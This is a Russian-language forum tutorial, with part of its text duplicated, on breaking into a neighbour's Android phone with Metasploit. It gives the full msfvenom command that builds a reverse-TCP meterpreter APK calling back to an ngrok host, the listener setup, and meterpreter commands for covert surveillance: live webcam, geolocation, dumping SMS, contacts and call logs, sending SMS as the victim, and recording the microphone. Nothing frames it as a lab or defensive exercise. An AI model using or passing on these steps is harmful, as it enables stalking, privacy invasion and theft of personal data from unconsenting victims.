Привет, хацкер, сегодня я научу тебя взламывать андроид твоей соседки при помощи Metasploit.
По сути эта статья является небольшим дополнением к прошлой, где я рассказывал, как взломать ПК при помоши Metasploit'a. Прочитать её можно нажав по . Ну, а если, ты уже прочитал прошлую стаью, то ты уже знаешь, о чём будет идти речь.
Поднимаем tcp соединение:
Теперь нам нужно создать пейлоад под систему Android'a:
Если ты не используешь Ngrok, то в поле LHOST вписываешь свой ip адрес, а в поле LPORT ставишь 4444
Payload готов. Осталось запустить прослушиватель порта на соединения.
Для этого выполняем такие команды (в случае с Ngrok):
Теперь, когда вы увидите надпись: "Started reverse TCP handler on...", прослушиватель готов, можем подкинуть жертве наш пейлоад.
Список интересных команд для meterpreter:
Все команды можно узнать прописав help в терминале метерпретера.
На этом всё, Metasploit довольно обширный инструмент, на все его возможности уйдёт не один цикл статей. Если продолжать эту тему, то поддержи статью лайком.
Остались вопросы?
- Задавай их в этой теме, или в моей личке, удачи.
По сути эта статья является небольшим дополнением к прошлой, где я рассказывал, как взломать ПК при помоши Metasploit'a. Прочитать её можно нажав по . Ну, а если, ты уже прочитал прошлую стаью, то ты уже знаешь, о чём будет идти речь.
Поднимаем tcp соединение:
Теперь нам нужно создать пейлоад под систему Android'a:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19752 R > payload.apk
Если ты не используешь Ngrok, то в поле LHOST вписываешь свой ip адрес, а в поле LPORT ставишь 4444
Payload готов. Осталось запустить прослушиватель порта на соединения.
Для этого выполняем такие команды (в случае с Ngrok):
Форматирование (BB-код):
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
Теперь, когда вы увидите надпись: "Started reverse TCP handler on...", прослушиватель готов, можем подкинуть жертве наш пейлоад.
Список интересных команд для meterpreter:
- Просмотр камеры в режиме реального времени:
webcam_stream
- Узнать текущую геолокацию:
geolocate
- Дампы: смс, контакты, история звонков:
Код:
dump_sms
dump_calllog
dump_contacts
- Отправка смс от имени жертвы:
send_sms
- Запись микрофона:
record_mic
- Скриншот экрана:
screenshot
- Блокировка экрана:
wakelock
Все команды можно узнать прописав help в терминале метерпретера.
На этом всё, Metasploit довольно обширный инструмент, на все его возможности уйдёт не один цикл статей. Если продолжать эту тему, то поддержи статью лайком.
Остались вопросы?
- Задавай их в этой теме, или в моей личке, удачи.